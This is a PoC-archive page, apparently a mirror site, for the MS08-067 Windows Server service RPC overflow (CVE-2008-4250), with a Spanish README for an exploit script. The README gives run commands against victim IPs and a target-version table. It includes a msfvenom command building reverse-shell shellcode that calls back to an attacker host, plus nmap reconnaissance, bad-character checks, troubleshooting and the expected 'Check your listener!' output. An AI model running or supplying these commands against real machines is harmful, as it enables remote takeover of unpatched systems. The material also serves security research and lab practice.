Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2008-4250 PoC — Windows Server服务 RPC请求缓冲区错误漏洞

Source
Associated Vulnerability
Title:Windows Server服务 RPC请求缓冲区错误漏洞 (CVE-2008-4250)
Description:The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability."
Description
MS08-067 | CVE-2008-4250
Readme
# Guía Completa de Uso: # Exploit MS08-067 Mejorado

## 📌 Uso Básico
```bash
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]
```

## 🎯 Ejemplos Prácticos

### 1. Windows XP SP0/SP1 (Puerto Default 445)
```bash
python3 Exploit_MS08-067.py 192.168.1.100 1
```

### 2. Windows 2003 SP1 English (Puerto 139)
```bash
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139
```

### 3. Con Shellcode Personalizado
```bash
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
```

## 🔍 Parámetros Obligatorios
| Parámetro    | Descripción                          | Valores Válidos |
|--------------|--------------------------------------|-----------------|
| `IP_VÍCTIMA` | IP del objetivo                      | Cualquier IPv4  |
| `VERSIÓN_OS` | Versión del SO vulnerable           | 1-7 (ver tabla) |

## 📋 Tabla de Versiones SOPORTADAS
| Valor | Sistema Operativo                | Arquitectura |
|-------|----------------------------------|--------------|
| 1     | Windows XP SP0/SP1 Universal     | x86          |
| 2     | Windows 2000 Universal           | x86          |
| ...   | ...                               | ...          |

## ⚙️ Opciones Adicionales
| Opción          | Descripción                              | Default |
|-----------------|------------------------------------------|---------|
| `-p/--port`     | Puerto SMB (445/139)                     | 445     |
| `-t/--timeout`  | Timeout en segundos                      | 5       |
| `-s/--shellcode`| Ruta a shellcode personalizado           | None    |

## 🛠️ Generación de Shellcode con msfvenom
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows
```

## 🔎 Identificación del Objetivo
```bash
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>
```

## 🚨 Solución de Problemas Comunes

### Error: `STATUS_OBJECT_NAME_NOT_FOUND`
1. Verifica si el servicio Browser está activo:
   ```bash
   nmap -p 445 --script smb-enum-shares <IP>
   ```

2. Prueba con otro pipe (modifica el script):
   ```python
   # Cambiar \\pipe\\browser por \\pipe\\srvsvc
   ```

### Shellcode no ejecuta
- Verifica caracteres prohibidos: `\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40`
- Usa este comando para validar:
  ```bash
   msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
   ```

## 💡 Recomendaciones Éticas
✅ Usar solo en entornos autorizados  
❌ Nunca en sistemas de producción sin permiso  

## 📊 Salida Exitosa Esperada
```plaintext
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!
```

> ⚠️ **Nota**: Este exploit no funciona en sistemas parcheados con el boletín MS08-067.
File Snapshot

[4.0K] /data/pocs/d433192b1b6bd48ef0c77bf70a89a688659a807b ├── [ 12K] Exploit_MS08-067.py └── [2.8K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →